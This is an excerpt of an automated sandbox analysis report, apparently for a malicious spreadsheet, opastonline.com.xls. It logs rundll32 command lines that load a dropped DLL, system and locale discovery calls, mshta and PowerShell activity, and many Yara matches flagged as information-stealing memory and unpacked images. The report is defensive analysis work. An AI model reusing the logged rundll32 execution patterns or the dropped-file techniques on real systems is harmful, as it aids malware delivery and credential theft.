Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
Source: Yara match File source: opastonline.com.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\opastonline.com.xls, type: DROPPED

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 10_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 10_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 10_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 12_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 12_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 12_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003DAA7 cpuid 10_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 10_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 10_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 10_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3280000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29a0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ba0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23f0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3240000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e60000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30a0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.340000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31d0000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2aa0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2720000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3000000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2330000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31a0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED